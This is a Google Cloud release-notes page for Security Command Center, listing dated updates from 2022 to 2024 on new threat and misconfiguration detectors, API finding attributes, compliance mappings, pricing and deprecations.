Security Command Center release notes

This page documents production updates to Security Command Center and the products and features available in the Security Command Center Premium and Standard tiers. You can periodically check this page for announcements about new or updated features, bug fixes, known issues, and deprecated functionality.

You can see the latest product updates for all of Google Cloud on the Google Cloud page, browse and filter all release notes in the Google Cloud console, or programmatically access release notes in BigQuery.

To get the latest product updates delivered to you, add the URL of this page to your feed reader, or add the feed URL directly: https://cloud.google.com/feeds/scc-release-notes.xml

March 21, 2024

Security Command Center detectors are now mapped to the following additional compliance frameworks:

  • CIS Critical Security Controls v8
  • Cloud Controls Matrix v 4
  • HIPAA
  • ISO 27001 (2022)
  • NIST 800-53 (rev 5)
  • NIST Cybersecurity Framework (v 1.0)
  • PCI-DSS 4.0
  • SOC 2 (2017)

March 20, 2024

New misconfiguration detectors for AlloyDB for PostgreSQL clusters released to General Availability.

Security Health Analytics, a built-in service of Security Command Center, released new detectors to General Availability. The following detectors, which are available only with the Premium tier of Security Command Center, detect misconfigurations in AlloyDB for PostgreSQL clusters and instances:

  • ALLOYDB_AUTO_BACKUP_DISABLED: Automated backups are not enabled in AlloyDB for PostgreSQL cluster.
  • ALLOYDB_LOG_ERROR_VERBOSITY: Instance database flag log_error_verbosity for AlloyDB for PostgreSQL instance is not set to default or another less restrictive value.
  • ALLOYDB_LOG_MIN_ERROR_STATEMENT_SEVERITY: Instance database flag log_min_error_statement for AlloyDB for PostgreSQL instance is not set to ERROR or lower.
  • ALLOYDB_LOG_MIN_MESSAGES: Instance database flag log_min_messages for AlloyDB for PostgreSQL instance is not set to at minimum warning.

For more information, see SQL vulnerability findings.

February 29, 2024

Security Command Center API v2 released to Preview

The Security Command Center API v2, which enables data residency control and includes the /locations/LOCATION field in resource names, is released to Preview.

For more information, see the REST reference Security Command Center API Overview.

Data residency for Security Command Center release to Preview

Security Command Center data residency control is released to Preview. Security Command Center supports the following data locations:

  • European Union (eu)
  • United States (us)
  • Global (global)

For more information, see Data residency.

February 28, 2024

Virtual Machine Threat Detection, a built-in service of Security Command Center Premium, has launched a new detector, Defense Evasion: Rootkit, in Preview.

The detector monitors virtual machines and generates a finding if a combination of signals matching a known kernel-mode rootkit is present.

For more information, see Virtual Machine Threat Detection overview.

February 20, 2024

Manual control of finding state deprecated for vulnerabilities and misconfigurations

Starting October 21, 2024, you will no longer be able to manually update the state of vulnerability or misconfiguration findings that are issued by Security Health Analytics or VM Manager. Security Command Center will return an error message on manual attempts to change the values of the state. Security Command Center will also begin preventing the manual creation of findings under the exact same name as a source that is automatically managed by Security Command Center in order to prevent the creation of findings that can never be resolved.

For more information, see Finding states.

Pane on Overview page that supports postures for Vertex AI released to Preview

A pane on the Overview page lets you monitor for vulnerabilities that were found by the Security Health Analytics custom modules that apply to Vertex AI, and lets you view any drift from the Vertex AI organization policies that are defined in a posture.

For more information, see Monitor posture drift.

February 14, 2024

Support for VPC Service Controls released to General Availability

You can now protect Security Command Center using VPC Service Controls perimeters. For more information, see VPC Service Controls supported products.

February 11, 2024

Exports of compliance reports will require new permissions

On or after March 15, 2024, a new Identity and Access Management (IAM) permission will be required to export a compliance report from the Google Cloud console. If you use custom roles to control access to Google Cloud resources, you will need to add this new permission to your custom roles before that date to continue exporting compliance reports.

For more information, see Export a compliance report.

February 06, 2024

New security posture service released to General Availability

The new security posture service is released to General Availability. This service lets you create and deploy postures so that you can define the policies for your Google Cloud organization and monitor for drift.

For more information, see Security posture overview.

Mandiant analyst CVE ratings added to vulnerability findings

The addition of CVE information, including ratings of the vulnerability by Mandiant Threat Intelligence analysts, to the details of Security Command Center vulnerability findings is released to Preview. You can now prioritize vulnerabilities based on the exploitability and impact ratings from Mandiant. For more information, see Prioritize vulnerability findings to reduce risk.

Improvements to compliance standards support now available

Improvements to the Security Command Center Compliance page in the Google Cloud console are released to General Availability. Your state of compliance with all supported standards is now presented more clearly and a new Compliance details page makes it easier to see failing controls. For more information, see Assess and report compliance.

Prioritize high-value resources automatically by data sensitivity

The optional integration of the Sensitive Data Protection discovery feature with the Security Command Center attack path simulation feature is released to Preview. If you use Sensitive Data Protection discovery, you can choose to have the priority value of supported high-value resources set automatically based on whether they contain medium-sensitivity or high-sensitivity data. For more information, see Set resource priority values automatically by data sensitivity.

Attack exposure scores informed by Mandiant Threat Intelligence

The inclusion of CVE exploitability ratings in the calculation of attack exposure scores for vulnerability findings is released to Preview. The ratings, which are provided by Mandiant Threat Intelligence analysts, enables Security Command Center attack path simulations to provide more accurate scores for prioritizing vulnerability findings. For more information, see Incorporation of CVE data.

High-value resources now include attack exposure scores

The calculation of attack exposure scores for high-value resources by the Security Command Center Attack Path Simulations feature is released to Preview. Use attack exposure scores on resources to proactively secure the resources that are the most valuable to your business. For more information, see Attack exposure scores.

January 31, 2024

Virtual Machine Threat Detection, a built-in service of Security Command Center, launched the Malware: Malicious file on disk (YARA) detector to Preview. This detector generates a finding if an executable file in a virtual machine matches known malware signatures.

January 26, 2024

Security Command Center Management API released to General Availability

The Security Command Center Management API, which provides API support for managing settings and custom modules, is released to General Availability.

For more information, see Security Center Management API.

January 24, 2024

New Container Threat Detection service account deferred

The new service account for Container Threat Detection that was included with new activations of Security Command Center after December 7, 2023 was temporarily removed from new activations on Dec 19, 2023 due to issues with older GKE clusters.

If you activated Security Command Center during this time period, all issues have been resolved and there is no impact to your experience.

New activations of Security Command Center will use the service account that was used prior to December 7, 2023 with the Container Threat Detection service until further notice.

For more information about the new service account, see Required IAM permissions.

January 10, 2024

Issue that caused finding severities to change unexpectedly is resolved

Between December 11, 2023 and January 10, 2024, an issue might have changed the severities of some findings unexpectedly. As of today, the issue has been fixed for all customers. Any finding severities that were changed have been returned to their original state.

December 15, 2023

The custom modules feature for Event Threat Detection is now in General Availability. This feature lets you create custom Event Threat Detection detectors that meet the unique needs of your organization.

In addition, the Unexpected Cloud API Call module type is now available. This module type lets you create a custom module that detects when a specified principal calls a specified method against a specified resource.

For more information, see Overview of custom modules for Event Threat Detection.

December 13, 2023

Custom roles will require new permissions for custom modules

On or after January 22, 2024, new Identity and Access Management (IAM) permissions will be required to work with custom modules for both Event Threat Detection and Security Health Analytics. If you use custom roles to control access to Google Cloud resources, you will need to add these new permissions to your custom roles before that date to continue working with custom modules.

For more information, see the following:

December 11, 2023

New Container Threat Detection service account with new activations

For activations of Security Command Center after December 7, 2023, Container Threat Detection uses a new service account for Identity and Access Management (IAM) permissions.

During the activation process, new users grant permissions to two service accounts: one for Security Command Center and one for Container Threat Detection. The new service account speeds the first-time enablement of Container Threat Detection.

If you activated Security Command Center prior to December 7, 2023, Container Threat Detection remains unchanged and continues to use its original service account.

For more information, see Service agent roles.

December 07, 2023

New goal-based query presets for identity and access misconfigurations

New goal-based query presets on the Security Command Center Vulnerabilities page are released to Preview.

The query presets support cloud infrastructure entitlement management (CIEM) by filtering vulnerability finding categories to those that are related to principal accounts that are misconfigured or that have excessive permissions to Google Cloud resources.

For more information, see Goal-based query presets.

December 04, 2023

Policy Controller integration released to General Availability

The integration of Policy Controller for Kubernetes clusters with Security Command Center is released to General Availability. Violation alerts from Policy Controller appear in Security Command Center as misconfiguration findings.

For more information, see Policy Controller.

November 10, 2023

Policy Controller integration now in Preview

The integration of Policy Controller for Kubernetes clusters with Security Command Center is released to Preview. Violation alerts from Policy Controller now appear in Security Command Center as misconfiguration findings.

For more information, see Policy Controller.

November 08, 2023

Support for VPC Service Controls released to Preview

You can now protect Security Command Center using VPC Service Controls perimeters. For more information, see VPC Service Controls supported products.

October 19, 2023

Backup and DR Service threat detectors available in Security Command Center Premium

Event Threat Detection, a built-in service of Security Command Center, released new rules for the Google Cloud Backup and DR service to Preview. Security Command Center can now detect the following:

  • Backup and DR actions that inhibit system recovery
  • Backup and DR actions that result in data destruction

For more information, see:

October 18, 2023

Container Threat Detection, a built-in service of Security Command Center Premium, has launched a new detector, Unexpected Child Shell, in Preview.

The detector monitors all process executions and generates a finding if a process that does not normally invoke shells spawns a shell process.

For more information, see Container Threat Detection detectors.

October 09, 2023

Cloud IDS threat detections available in Security Command Center

Threats that are detected by Cloud IDS, a Google Cloud intrusion detection service, are now included in the findings that are issued by the Event Threat Detection service of Security Command Center. This feature is available in Preview.

For more information, see:

September 29, 2023

containsOnly() function released to General Availability.

You can now use the containsOnly() function to query findings with an array-type attribute or subfield that only contains values that match the specified filter, and no other values.

For more information, see The containsOnly function.

September 20, 2023

Attack path simulations support additional resources

The attack path simulation feature that generates attack exposure scores and attack paths for your high-value resources now supports the following additional Google Cloud resources:

  • aiplatform.googleapis.com/Dataset
  • aiplatform.googleapis.com/Featurestore
  • aiplatform.googleapis.com/MetadataStore
  • aiplatform.googleapis.com/Model
  • aiplatform.googleapis.com/TrainingPipeline
  • container.googleapis.com/Cluster

For more information, see Resource types supported in high-value resource sets.

September 19, 2023

Vulnerabilities per resource type graphic released to General Availability

The Security Command Center Overview page in the Cloud console now shows a Vulnerabilities per resource type graphic, which replaces the Active vulnerabilities over time by severity graphic. The Vulnerabilities per resource type graphic shows the resources in your organization (for example, Cloud Storage buckets, Compute Engine instances, and firewalls), how many active vulnerabilities exist for each resource, and the severity of those vulnerabilities.

September 15, 2023

Event Threat Detection, a built-in service of Security Command Center, released a new rule, Initial Access: Leaked Service Account Key Used, to General Availability.

For more information, see Event Threat Detection rules.

September 11, 2023

Security Command Center now supports CIS Google Cloud Computing Foundations Benchmark v2.0.0.

The support for v2.0.0 includes the following new vulnerability detector:

  • Load balancer logging disabled

For more information, see the following:

August 21, 2023

inIpRange() function released to General Availability

You can now specify a range of IP addresses by using the inIpRange() function in query statements to filter findings that contain IPv4 or IPv6 addresses within the specified range.

For more information, see The inIpRange function.

August 16, 2023

New assets experience released to General Availability

The Security Command Center Assets page in the Cloud console is now powered by Cloud Asset Inventory. The new Assets page provides expanded asset visibility and includes a new asset query feature.

This release is part of the planned deprecation of the Security Command Center Assets API scheduled for on or after June 20, 2024.

For more information, see Assets page.

August 03, 2023

Attack exposure scores and attack paths released to General Availability

The attack path simulation feature that generates attack exposure scores and attack paths for findings that expose your high-value resources is now released to General Availability.

For information about the feature, see Attack exposure scores and attack paths.

AI-generated summaries of the simulated attack paths for Security Command Center findings are released to Preview. When you view the attack path for a finding, you can now read explanations that are generated dynamically by artificial intelligence (AI).

For more information, see AI-generated summaries.

July 31, 2023

The Security Health Analytics detector NETWORK_POLICY_DISABLED now recognizes network policies that are implemented by using GKE Dataplane V2.

For more information, see the following:

July 26, 2023

The custom modules feature for Event Threat Detection is now in Preview. Custom modules allow you to define custom detectors for Event Threat Detection.

For more information, see Overview of custom modules for Event Threat Detection.

July 14, 2023

AI-generated summaries of Security Command Center findings are released to Preview. When you view finding details, you can now read explanations that are generated dynamically by artificial intelligence (AI).

For more information, see AI-generated summaries.

July 13, 2023

Recommendations from the IAM recommender are now available as findings in Security Command Center in a Preview release.

The following IAM recommender recommendations are now published as Vulnerability class findings in Security Command Center:

  • IAM role has excessive permissions
  • Service agent role replaced with basic role
  • Service agent granted basic role
  • Unused IAM role

For more information, see Security sources > IAM recommender.

June 28, 2023

As of June 20, 2023, Security Command Center Asset API endpoints and dependent functionality are deprecated and will be removed from the product for all users on or after June 20, 2024. Use Cloud Asset Inventory and its API instead.

After June 20, 2023, the asset functionality is not included with new activations of Security Command Center.

If you activated Security Command Center before June 20, 2023, but have not used the asset functionality in the 90 days prior to June 20, 2023, the asset functionality is removed.

If you activated Security Command Center before June 20, 2023, and have used the asset functionality in the 90 days prior to June 20, 2023, the asset functionality remains available for you until June 20, 2024 or later.

The deprecation applies to the following Security Command Center interfaces:

  • Security Command Center Asset API endpoints
  • Except for gcloud scc assets update-marks, which is not deprecated, the assets subgroup of the gcloud scc CLI command
  • The Assets page and related functionality in the Google Cloud Console

June 22, 2023

Only the Security Center Service Agent (roles/securitycenter.serviceAgent) role is required by the Security Command Center service account. Previously, the service account also required the roles/serviceusage.serviceUsageAdmin and roles/cloudfunctions.serviceAgent roles to work properly.

June 21, 2023

Event Threat Detection, a built-in service of Security Command Center, released the following new rules to General Availability.

  • Initial Access: Dormant Service Account Action
  • Privilege Escalation: Dormant Service Account Granted Sensitive Role
  • Persistence: Impersonation Role Granted For Dormant Service Account
  • Initial Access: Dormant Service Account Key Created

For more information, see Event Threat Detection rules.

June 12, 2023

New Finding attribute: userAgent

The userAgent attribute is added to the Access object, which is included in the Finding object of the Security Command Center API.

The userAgent attribute identifies the user agent of the caller that is associated with a Security Command Center finding.

For more information, see the Security Command Center API documentation for the Finding object.

June 08, 2023

Usage-based pricing for organization-level activations of Security Command Center

You can now use usage-based pricing instead of a fixed-price subscription to activate Security Command Center Premium tier at the organization level. The feature lets you activate Security Command Center at the organization level yourself in the Cloud console. Billing for organization-level activations of Security Command Center is based on the resource consumption in your organization and uses a usage-based pricing model.

For more information, see Overview of organization-level activation.

Security Command Center Cryptomining Protection Program

The Security Command Center Cryptomining Protection Program is launched to General Availability. The program offers financial protection up to $1 million USD to cover unauthorized Google Cloud compute expenses that are associated with undetected cryptocurrency mining attacks for Security Command Center Premium customers.

For more information, see Security Command Center Cryptomining Protection Program.

June 02, 2023

The Google Cloud console has been updated to change how you open Security Command Center pages. Previously, you selected pages using tabs on the main page. Now you select pages from the slide-out menu on the left side of the console. To show the menu, hold your pointer over the icons on the left side of the console.

For an overview of the pages, see Using Security Command Center in the Google Cloud console.

May 17, 2023

With project-level activations of the Security Command Center Premium tier, you can now enable certain Premium-tier threat and vulnerability findings that require organization-level access by activating the Standard tier at the organization level in addition to your project-level activation. These finding categories were previously unsupported with project-level activations.

For more information, see Premium tier feature support with project-level activations.

May 15, 2023

The pricing for project-level activations of Security Command Center has been reduced by lowering the Security Command Center rate for the usage of the following Google Cloud services:

  • Compute Engine
  • GKE-Autopilot
  • App Engine
  • Cloud SQL

For more information, see Pricing for project-level activations.

May 04, 2023

An issue that affected the display of the counts of controls for certain CIS Google Cloud Platform Benchmark (CIS Benchmark) reports in the Google Cloud console has been fixed.

On March 31, 2023, an update to Security Health Analytics affected the behavior of certain detectors for versions 1.0, 1.1, and 1.2 of the CIS Benchmark reports. The count of controls for CIS Benchmark version 1.3, as well any as CSV exports, were unaffected.

Between March 31, 2023 and May 4, 2023, the following detectors might have been counted and grouped under the incorrect CIS level on the Compliance tab of Security Command Center:

  • API_KEY_EXISTS
  • API_KEY_APIS_UNRESTRICTED
  • API_KEY_NOT_ROTATED
  • FIREWALL_NOT_MONITORED
  • ROUTE_NOT_MONITORED
  • NETWORK_NOT_MONITORED
  • BUCKET_IAM_NOT_MONITORED
  • SQL_INSTANCE_NOT_MONITORED
  • VPC_FLOW_LOGS_SETTINGS_NOT_RECOMMENDED
  • SQL_LOG_STATEMENT
  • ACCESS_TRANSPARENCY_DISABLED

April 26, 2023

Event Threat Detection, a built-in service of Security Command Center, launched the following new rules to Preview.

  • Persistence: Impersonation Role Granted For Dormant Service Account
  • Privilege Escalation: Dormant Service Account Granted Sensitive Role

The Persistence: Impersonation Role Granted For Dormant Service Account rule detects events where a principal is granted permissions to impersonate a dormant user-managed service account.

The Privilege Escalation: Dormant Service Account Granted Sensitive Role rule detects events where a dormant user-managed service account was granted one or more sensitive IAM roles.

For more information, see Event Threat Detection rules.

April 13, 2023

Event Threat Detection, a built-in service of Security Command Center, launched the following new rules to Preview.

  • Defense Evasion: Breakglass Workload Deployment Created
  • Defense Evasion: Breakglass Workload Deployment Updated

These rules detect when the break-glass flag is used to override Binary Authorization controls when deploying or updating workloads. For more information, see Event Threat Detection rules.

April 12, 2023

The custom modules feature for Security Health Analytics is now generally available (GA). Custom modules allow you to define custom detectors for Security Health Analytics.

For more information, see Overview of custom modules for Security Health Analytics.

April 11, 2023

Event Threat Detection, a built-in service of Security Command Center, launched the following new rules to General Availability.

  • Privilege Escalation: Anomalous Impersonation of Service Account for Admin Activity
  • Privilege Escalation: Anomalous Multistep Service Account Delegation for Admin Activity
  • Privilege Escalation: Anomalous Multistep Service Account Delegation for Data Access
  • Privilege Escalation: Anomalous Service Account Impersonator for Admin Activity
  • Privilege Escalation: Anomalous Service Account Impersonator for Data Access

These rules detect anomalous activities that are taken by someone who is using an impersonated service account to access Google Cloud. For more information, see Event Threat Detection rules.

April 06, 2023

The legacy version of the Findings tab is removed from Security Command Center in the Google Cloud console. You can work with findings in the Google Cloud console only by using the new version of the Findings tab.

For more information, see Work with findings in the Google Cloud console.

April 03, 2023

The moduleName attribute is added to the Finding object of the Security Command Center API.

The moduleName attribute, when included in a finding, identifies the full resource name of the specific detection module of the Security Command Center service that generated the finding.

For more information, see the Security Command Center API documentation for the Finding object.

March 31, 2023

Security Command Center supports CIS Google Cloud Computing Foundations Benchmark v1.3.0.

The following detectors are new for v1.3.0:

  • Access transparency disabled
  • Cloud Asset API disabled
  • Dataproc CMEK disabled
  • Essential contacts not configured
  • Flow logs settings not recommended

The following detectors have been updated:

  • Audit logging disabled

For more information about Security Command Center support for standards and compliance, see the following:

March 23, 2023

The March 20, 2023 release of the Google Cloud SCC content pack for sending Security Command Center data to Cortex XSOAR is generally available.

This version includes support for multiple Google Cloud organizations, bug fixes, and supportability improvements.

For information about downloading and installing the new content pack, see Upgrade the Google Cloud SCC content pack.

The version 3.0 release of the Google SCC App for QRadar, which lets you send Security Command Center data to QRadar v7.4.1FP2+, is generally available.

This version includes support for multiple Google Cloud organizations, bug fixes, and supportability improvements.

For information about downloading and installing the new application, see Upgrade the Google SCC app.

The version 3.0 release of the Google SCC App for ELK, which lets you send Security Command Center data to Elastic Stack, is generally available.

This version includes support for multiple Google Cloud organizations, bug fixes, and supportability improvements.

For information about downloading and installing the new application, see Upgrade the Docker container.

The version 2.0 release of the Google SCC Add-on For Splunk and the Google SCC App For Splunk, which let you send Security Command Center data to Splunk, is generally available.

This version includes support for multiple Google Cloud organizations, bug fixes, and supportability improvements.

For information about downloading and installing the new applications, see Upgrade Google SCC App for Splunk and Google SCC Add-on for Splunk.

March 17, 2023

Virtual Machine Threat Detection, a built-in service of Security Command Center, launched the following detectors to Preview.

  • Defense Evasion: Unexpected kernel code modification
  • Defense Evasion: Unexpected kernel read-only data modification
  • Defense Evasion: Unexpected ftrace handler
  • Defense Evasion: Unexpected interrupt handler
  • Defense Evasion: Unexpected kernel modules
  • Defense Evasion: Unexpected kprobe handler
  • Defense Evasion: Unexpected processes in runqueue
  • Defense Evasion: Unexpected system call handler

These modules analyze runtime Linux kernel integrity to detect common evasion techniques used by malware.

The following attributes were added to the Finding object of the Security Command Center API.

  • cloudDlpInspection
  • cloudDlpDataProfile

The cloudDlpInspection attribute provides details about the results of a Cloud Data Loss Prevention (Cloud DLP) inspection job. The cloudDlpDataProfile attribute provides the name of a Cloud DLP data profile that is associated with a finding.

For more information, see the Security Command Center API documentation for the Finding object.

Event Threat Detection, a built-in service of Security Command Center Premium, has launched the Initial Access: Excessive Permission Denied Actions rule to General Availability. This rule detects events where a principal repeatedly triggers permission denied errors across multiple methods and services.

For more information about Event Threat Detection findings, see Event Threat Detection rules.

March 01, 2023

The legacy version of the Findings tab in the Security Command Center dashboard in the Cloud console is now deprecated. Similar functionality is currently available in the new version of the Findings tab.

After March 31, 2023, the option to use the legacy Findings tab will be removed from the dashboard. After that date, you will be able to work with findings in the console only by using the newer, default version of the Findings tab.

For more information about working with Security Command Center findings by using the default Findings tab, see Work with findings in the Security Command Center.

February 07, 2023

Event Threat Detection, a built-in service of Security Command Center, launched the Persistence: New API Method rule to General Availability. This rule detects anomalous usage of Google Cloud services by IAM service accounts. For more information, see Event Threat Detection rules.

February 06, 2023

The version 1.0 release of the Google SCC ITSM app and the Google SCC SIR app, which let you send data, such as findings, sources, assets, and audit logs, from Security Command Center to ServiceNow, is generally available. For information about downloading and installing the new applications, see Sending Security Command Center data to ServiceNow.

January 30, 2023

Project-level activation of Security Command Center

The Security Command Center project-level activation feature is generally available. The feature lets you enable Security Command Center for individual Google Cloud projects yourself in the Cloud console. Billing for project-level activations of Security Command Center is based on resource consumption in the project and uses a pay-as-you-go billing model.

For more information, see Overview of project-level activation.

January 27, 2023

The new and improved Findings page in the Cloud Console is now generally available and the default view for working with Security Command Center findings. With the redesigned Findings page, you can query, filter, and investigate Security Command Center findings faster and more efficiently. For more information, see Work with findings in the Security Command Center dashboard.

December 22, 2022

The userName attribute was added to the Finding object of the Security Command Center API.

The value of the userName attribute depends on the type of the finding and is likely not an IAM principal. For example, this can be a system username if the finding is related to a virtual machine, or it be an application login username.

For more information, see the Security Command Center API documentation for the Finding object.

December 16, 2022

Event Threat Detection, a built-in service of Security Command Center, launched the Initial Access: Dormant Service Account Action rule to Preview. This rule detects events where a dormant user-managed service account triggered an action. For more information, see Event Threat Detection rules.

December 15, 2022

Event Threat Detection, a built-in service of Security Command Center, launched the following rules to Preview.

  • Privilege Escalation: Anomalous Impersonation of Service Account for Admin Activity
  • Privilege Escalation: Anomalous Multistep Service Account Delegation for Admin Activity
  • Privilege Escalation: Anomalous Multistep Service Account Delegation for Data Access
  • Privilege Escalation: Anomalous Service Account Impersonator for Admin Activity
  • Privilege Escalation: Anomalous Service Account Impersonator for Data Access

These rules detect the unusual impersonation or delegation of a service account, as recorded in either the Admin Activity or Data Access audit logs. For more information, see Event Threat Detection rules.

December 08, 2022

The Malicious URL Observed detector of Container Threat Detection, a built-in service of Security Command Center Premium, is now generally available.

The detector checks URLs observed in arguments passed by executables against known phishing and malware URLs to determine if they are malicious.

You can see the full details of the detector's findings only if you upgrade to the refreshed findings display in the Security Command Center dashboard.

For more information, see the following pages:

Sensitive Actions Service, a built-in service of Security Command Center Premium, is now generally available.

Sensitive Actions Service detects when actions are taken in your Google Cloud organization, folders, and projects that could be damaging to your business if they were to be taken by a malicious actor.

For more information, see Sensitive Actions Service overview.

December 05, 2022

The kernelRootkit attribute was added to the Finding object of the Security Command Center API.

The kernelRootkit attribute contains information about a kernel rootkit that triggered a finding, including the following:

  • Name of the rootkit, if available.
  • Whether unexpected modifications were made to the kernel's code, read-only data memory, or certain important kernel data structures.

For more information, see the Security Command Center API documentation for the Finding object.

December 02, 2022

Event Threat Detection, a built-in service of Security Command Center, launched the Initial Access: Database Superuser Writes to User Tables rule to General Availability. This rule detects events where a Cloud SQL superuser (postgres for PostgreSQL servers or root for MySQL users) writes to non-system tables. For more information, see Event Threat Detection rules.

November 16, 2022

Event Threat Detection, a built-in service of Security Command Center Premium, has launched the Initial Access: Excessive Permission Denied Actions rule to Preview. This rule detects events where a principal repeatedly triggers permission denied errors across multiple methods and services.

For more information about Event Threat Detection findings, see Event Threat Detection rules.

November 14, 2022

The files attribute was added to the Finding object of the Security Command Center API.

The files attribute contains information about each file that triggered a finding, including the name of the file, the full path to the file, and the size of the file.

For more information, see the Security Command Center API documentation for the Finding object.

November 10, 2022

Security Command Center added the ability to export findings to a CSV file from the Google Cloud console. For more information, see Export findings to a CSV file.

November 07, 2022

Security Command Center released two new error detectors:

  • KTD blocked by admission controller
  • KTD image pull failure

These detectors report configuration errors that prevent the Container Threat Detection service from functioning properly.

Remediation guidance is provided for each finding type. For more information, see Security Command Center errors.

October 21, 2022

Event Threat Detection, a built-in service of Security Command Center, launched the following rules to general availability (GA).

  • Discovery: Can get sensitive Kubernetes object check
  • Privilege Escalation: Changes to sensitive Kubernetes RBAC objects
  • Privilege Escalation: Create Kubernetes CSR for master cert
  • Privilege Escalation: Creation of sensitive Kubernetes bindings
  • Privilege Escalation: Get Kubernetes CSR with compromised bootstrap credentials
  • Privilege Escalation: Launch of privileged Kubernetes container

These rules detect scenarios where a potentially malicious actor attempted to query or escalate privileges in Google Kubernetes Engine. For more information, see Event Threat Detection rules.

October 19, 2022

Rapid Vulnerability Detection, a built-in service of Security Command Center Premium, is now available in Preview.

Rapid Vulnerability Detection is a zero-configuration network and web application scanner that detects weak credentials, incomplete software installations, and other critical vulnerabilities that have a high likelihood of being exploited.

For more information, see Rapid Vulnerability Detection conceptual overview.

October 03, 2022

Error notifications in Security Command Center console

When Security Command Center detects configuration errors that prevent services from detecting threats or vulnerabilities, a pop-up notification appears in the Security Command Center console. The notification includes the number of configuration errors currently detected.

After you fix an error, the error notification is cleared after the next scan for that error type. For information about the scan interval for each error type, see Error detectors.

September 30, 2022

Sensitive Actions Service, a built-in service of Security Command Center Premium, is now available in Preview.

Sensitive Actions Service detects when actions are taken in your Google Cloud organization, folders, and projects that could be damaging to your business if they were to be taken by a malicious actor.

For more information, see Sensitive Actions Service overview.

Container Threat Detection, a built-in service of Security Command Center Premium, has launched a new detector, Malicious URL Observed, in Preview.

The detector checks URLs observed in arguments passed by executables against known phishing and malware URLs to determine if they are malicious.

Full details for this findings are available in the Security Command Center dashboard only if you upgrade to the refreshed findings display.

For more information, see:

September 28, 2022

The parentDisplayName attribute was added to the Finding object of the Security Command Center API.

The parentDisplayName attribute provides the display name of the Security Command Center service or source that produced a finding.

For more information, see the Security Command Center API documentation for the Finding object.

September 02, 2022

Event Threat Detection, a built-in service of Security Command Center, launched the Exfiltration: Cloud SQL Over-Privileged Grant rule to General Availability. This rule detects events where a Cloud SQL for PostgreSQL user or role was granted all privileges to a database, or to all tables, procedures, or functions in a schema. For more information, see Event Threat Detection rules.

August 22, 2022

The following attributes were added to the Finding object of the Security Command Center API:

  • Database provides information about access to a database that is related to a finding.
  • serviceAccountKeyName, serviceAccountDelegationInfo, and principalSubject attributes were added to the existing access attribute. These new attributes provide additional context about the principals that are associated with a finding.
  • uris, a new attribute within the indicator attribute, lists any malicious URIs that are associated with a finding.

For more information, see the Security Command Center API documentation for the Finding object.

August 08, 2022

Event Threat Detection, a built-in service of Security Command Center, launched the following rules to Preview.

  • Discovery: Can get sensitive Kubernetes object check
  • Privilege Escalation: Changes to sensitive Kubernetes RBAC objects
  • Privilege Escalation: Create Kubernetes CSR for master cert
  • Privilege Escalation: Creation of sensitive Kubernetes bindings
  • Privilege Escalation: Get Kubernetes CSR with compromised bootstrap credentials
  • Privilege Escalation: Launch of privileged Kubernetes container

These rules detect scenarios where a malicious actor attempted to query for or escalate privileges in Google Kubernetes Engine. For more information, see Event Threat Detection rules.

July 21, 2022

The container and kubernetes attributes were added to the Finding object.

The container attribute provides information about both Kubernetes and non-Kubernetes containers that are associated with a given finding. The kubernetes attribute provides information about Kubernetes resources that are associated with a given finding.

For more information, see the Security Command Center API documentation for the Finding object.

July 18, 2022

Virtual Machine Threat Detection, a built-in service of Security Command Center Premium, is generally available (GA). VM Threat Detection detects cryptocurrency mining software, which is among the most common types of software installed in compromised cloud environments.

June 30, 2022

The contacts and indicator.signatures attributes were added to the Finding object.

  • The contacts attribute is a map containing the contacts for the given finding. The key represents the type of contact, and the value contains a list of all contacts of that type.
  • The indicator.signatures[] attribute lists matched signatures that indicate that a given process is present in the environment.

For more information, see the API documentation for the Finding object.

May 27, 2022

The compliances, exfiltration, and processes attributes were added to the Finding object.

  • The compliances attribute provides details about security standards that are unmet.
  • The exfiltration attribute provides details about the sources and targets of an exfiltration attempt.
  • The processes attribute provides details about operating system processes relevant to a finding.

For more information, see the API documentation for the Finding object.

May 16, 2022

Updates were made to the applications that let you send Security Command Center data to to the following SIEM and SOAR platforms:

In addition, Security Command Center can automatically send findings, assets, audit logs, and security sources to Splunk. For more information, see Sending Security Command Center data to Splunk.

April 28, 2022

Security Command Center error detectors are generally available (GA). Error detectors report configuration errors that prevent Security Command Center and its services from functioning properly. Remediation guidance is provided for each finding type. For more information, see Security Command Center errors.

The connections[] and description attributes were added to the Finding object.

  • The connections[] attribute contains information about the IP connection associated with the finding. It includes the destination IP address, the destination port, the source IP address, the source port, and the protocol.
  • The description attribute provides an explanation of the finding.

For more information, see the API documentation for the Finding object.

April 07, 2022

The iamBindings[] and nextSteps attributes were added to the Finding object.

  • The iamBindings[] attribute provides a list of IAM bindings associated with the finding.
  • The nextSteps attribute provides recommended actions you can take to address the finding.

For more information, see the API documentation for the Finding object.

March 29, 2022

A revamp of the Findings workflow is in Preview. This Preview includes improvements in the filtering and querying experience. For a complete summary of improvements, see Summary: Findings Workflow Improvements. To opt in to this Preview, see Upgrade to the Findings Workflow Improvements.

March 07, 2022

To support a rich query experience on complex array elements, the contains() filter function was introduced. You can use this function in your finding queries to do the following:

  • Exact element matching: Match array elements that contain the exact string, "example".
  • Specific number operations: Match array elements that are greater than or equal to 100.
  • Complex filtering against array structures: Match array elements that contain property x with a corresponding value y.

For more information, see Filtering on array-type fields.

March 02, 2022

You can now configure automatic exports of Security Command Center findings to a BigQuery dataset. For more information, see Export findings to BigQuery for analysis.

The vulnerability.cve.upstreamFixAvailable attribute was added to the Finding object. This is a boolean field that specifies whether a Common Vulnerabilities and Exposures (CVE) fix is available. For more information, see the API documentation for the Finding object.

February 24, 2022

Security Command Center can automatically send findings, assets, and security sources to the following SIEM and SOAR platforms:

February 22, 2022

MITRE ATT&CK framework details related to findings are now available as finding attributes for all Security Command Center services. The framework explains tactics and techniques for attacks against cloud resources, and provides remediation guidance. Although these attributes are available across all built-in and integrated services, only Container Threat Detection and Event Threat Detection are populating them at this time. For more information, see the API documentation for the Findings object.

February 10, 2022

Access-related details are now available as finding attributes for all Security Command Center services. These attributes relate to an access event associated with a finding. They contain details such as the caller's IP address, which service and method was called, and what region the access event occurred in. Although access-related attributes are available across all built-in and integrated services, they're only populated by Event Threat Detection at this time. For more information, see the API documentation for the Findings object.

February 07, 2022

Previously, the following Event Threat Detection rules were made temporarily unavailable because they were generating extraneous findings:

  • Persistence: New API Method
  • Persistence: New Geography

The underlying issue has been resolved. These rules are now operational. For more information, see Event Threat Detection rules.

Security Health Analytics, a built-in service of Security Command Center, released the OPEN_GROUP_IAM_MEMBER detector to General Availability.

February 02, 2022

